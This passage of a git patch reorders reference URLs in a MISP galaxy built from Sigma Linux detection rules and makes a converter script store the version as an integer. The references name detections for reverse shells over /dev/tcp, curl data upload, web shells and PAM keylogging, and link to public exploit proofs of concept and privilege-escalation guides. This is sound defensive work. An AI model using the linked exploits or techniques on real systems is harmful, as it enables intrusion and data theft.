"https://www.cisecurity.org/controls/cis-controls-list/", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml" ], "tags": "No established tags" @@ -79616,8 +79640,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/Azure/Azure-Sentinel/pull/3059", "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/Azure/Azure-Sentinel/pull/3059", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml" ], "tags": [ @@ -79773,8 +79797,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", + "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml" ], "tags": [ @@ -80008,9 +80032,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md", "https://linux.die.net/man/8/insmod", "https://man7.org/linux/man-pages/man8/kmod.8.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml" ], "tags": [ @@ -80069,9 +80093,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ + "https://github.com/berdav/CVE-2021-4034", "https://access.redhat.com/security/cve/CVE-2021-4034", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034", - "https://github.com/berdav/CVE-2021-4034", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml" ], "tags": [ @@ -80104,8 +80128,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", "https://imagemagick.org/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", "https://linux.die.net/man/1/import", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml" ], @@ -80130,8 +80154,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", "https://firewalld.org/documentation/man-pages/firewall-cmd.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml" ], "tags": [ @@ -80189,9 +80213,9 @@ "logsource.product": "linux", "refs": [ "https://mn3m.info/posts/suid-vs-capabilities/", + "https://man7.org/linux/man-pages/man8/getcap.8.html", "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099", "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/", - "https://man7.org/linux/man-pages/man8/getcap.8.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml" ], "tags": [ @@ -80250,8 +80274,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "Self Experience", "https://github.com/Neo23x0/auditd/blob/master/audit.rules", + "Self Experience", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_auditing_config_change.yml" ], "tags": [ @@ -80275,8 +80299,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md", "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml" ], "tags": [ @@ -80664,8 +80688,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", + "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml" ], "tags": [ @@ -80830,8 +80854,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture", "https://linux.die.net/man/1/xwd", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml" ], "tags": [ @@ -80922,10 +80946,10 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ + "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu", + "https://linux.die.net/man/1/chage", "https://man7.org/linux/man-pages/man1/passwd.1.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md", - "https://linux.die.net/man/1/chage", - "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml" ], "tags": [ @@ -81050,10 +81074,10 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md", "https://linux.die.net/man/8/pam_tty_audit", - "https://access.redhat.com/articles/4409591#audit-record-types-2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md", "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", + "https://access.redhat.com/articles/4409591#audit-record-types-2", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml" ], "tags": [ @@ -81153,9 +81177,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ + "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files", "https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07", "https://access.redhat.com/articles/4409591#audit-record-types-2", - "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml" ], "tags": [ @@ -81188,9 +81212,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://book.hacktricks.xyz/shells/shells/linux", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan", "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/", + "https://book.hacktricks.xyz/shells/shells/linux", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml" ], "tags": [ @@ -81459,9 +81483,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://digital.nhs.uk/cyber-alerts/2018/cc-2825", "https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid", "https://linux.die.net/man/8/useradd", + "https://digital.nhs.uk/cyber-alerts/2018/cc-2825", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_privileged_user_creation.yml" ], "tags": [ @@ -81618,9 +81642,9 @@ "logsource.product": "linux", "refs": [ "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", + "https://artkond.com/2017/03/23/pivoting-guide/", "http://pastebin.com/FtygZ1cg", "http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html", - "https://artkond.com/2017/03/23/pivoting-guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml" ], "tags": [ @@ -81653,9 +81677,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ + "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/", "https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml", "https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/", - "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_priv_esc_prep.yml" ], "tags": [ @@ -81945,8 +81969,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c", + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml" ], "tags": [ @@ -82212,8 +82236,8 @@ "logsource.category": "file_event", "logsource.product": "linux", "refs": [ - "https://www.makeuseof.com/how-to-install-and-use-doas/", "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/", + "https://www.makeuseof.com/how-to-install-and-use-doas/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_doas_conf_creation.yml" ], "tags": [ @@ -82246,8 +82270,8 @@ "logsource.category": "network_connection", "logsource.product": "linux", "refs": [ - "https://twitter.com/hakluke/status/1587733971814977537/photo/1", "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", + "https://twitter.com/hakluke/status/1587733971814977537/photo/1", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml" ], "tags": [ @@ -82506,8 +82530,8 @@ "logsource.product": "linux", "refs": [ "https://gtfobins.github.io/gtfobins/vim/", - "https://gtfobins.github.io/gtfobins/vimdiff/", "https://gtfobins.github.io/gtfobins/rvim/", + "https://gtfobins.github.io/gtfobins/vimdiff/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml" ], "tags": [ @@ -82802,11 +82826,11 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ + "https://curl.se/docs/manpage.html", + "https://twitter.com/d1r4c/status/1279042657508081664", + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", - "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", - "https://twitter.com/d1r4c/status/1279042657508081664", - "https://curl.se/docs/manpage.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml" ], "tags": [ @@ -82847,8 +82871,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", + "https://gtfobins.github.io/gtfobins/apt/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml" ], "tags": [ @@ -82872,10 +82896,10 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://linuxize.com/post/how-to-delete-group-in-linux/", - "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", - "https://www.cyberciti.biz/faq/linux-remove-user-command/", "https://linux.die.net/man/8/userdel", + "https://linuxize.com/post/how-to-delete-group-in-linux/", + "https://www.cyberciti.biz/faq/linux-remove-user-command/", + "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_userdel.yml" ], "tags": [ @@ -83136,8 +83160,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/", + "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml" ], "tags": [ @@ -83262,8 +83286,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/Azure/Azure-Sentinel/pull/3059", "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/Azure/Azure-Sentinel/pull/3059", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml" ], "tags": [ @@ -83380,10 +83404,10 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://linux.die.net/man/8/groupdel", "https://linuxize.com/post/how-to-delete-group-in-linux/", - "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", "https://www.cyberciti.biz/faq/linux-remove-user-command/", + "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", + "https://linux.die.net/man/8/groupdel", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_groupdel.yml" ], "tags": [ @@ -83416,8 +83440,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS", + "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml" ], "tags": [ @@ -83450,8 +83474,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/carlospolop/PEASS-ng", "https://github.com/diego-treitos/linux-smart-enumeration", + "https://github.com/carlospolop/PEASS-ng", "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml" ], @@ -83713,8 +83737,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/Azure/Azure-Sentinel/pull/3059", "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/Azure/Azure-Sentinel/pull/3059", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml" ], "tags": [ @@ -83765,9 +83789,9 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://gtfobins.github.io/gtfobins/nohup/", "https://en.wikipedia.org/wiki/Nohup", "https://www.computerhope.com/unix/unohup.htm", + "https://gtfobins.github.io/gtfobins/nohup/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml" ], "tags": "No established tags" @@ -84058,8 +84082,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md", "https://attack.mitre.org/techniques/T1548/001/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml" ], "tags": [ @@ -84092,8 +84116,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/apache/spark/pull/36315/files", "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", + "https://github.com/apache/spark/pull/36315/files", "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml" ], @@ -84161,8 +84185,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/", "https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/", + "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml" ], "tags": [ @@ -84222,5 +84246,5 @@ "value": "Security Software Discovery - Linux" } ], - "version": "20230112" + "version": 20230112 } From 997e570ad23aad74ddd3ec6517c71b907fa0cdfd Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Fri, 13 Jan 2023 16:38:56 +0100 Subject: [PATCH 13/13] fix: [sigma] version must be an int --- tools/sigma/sigma-to-galaxy.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/sigma-to-galaxy.py b/tools/sigma/sigma-to-galaxy.py index ef912e6..50b8e50 100644 --- a/tools/sigma/sigma-to-galaxy.py +++ b/tools/sigma/sigma-to-galaxy.py @@ -127,7 +127,7 @@ def create_cluster(uuidGalaxy=unique_uuid): :return cluster: Dict with the basic information needed for the JSON file. """ - version = time.strftime("%Y%m%d") + version = int(time.strftime("%Y%m%d")) cluster = { "authors": ["@Joseliyo_Jstnk"], "category": "rules",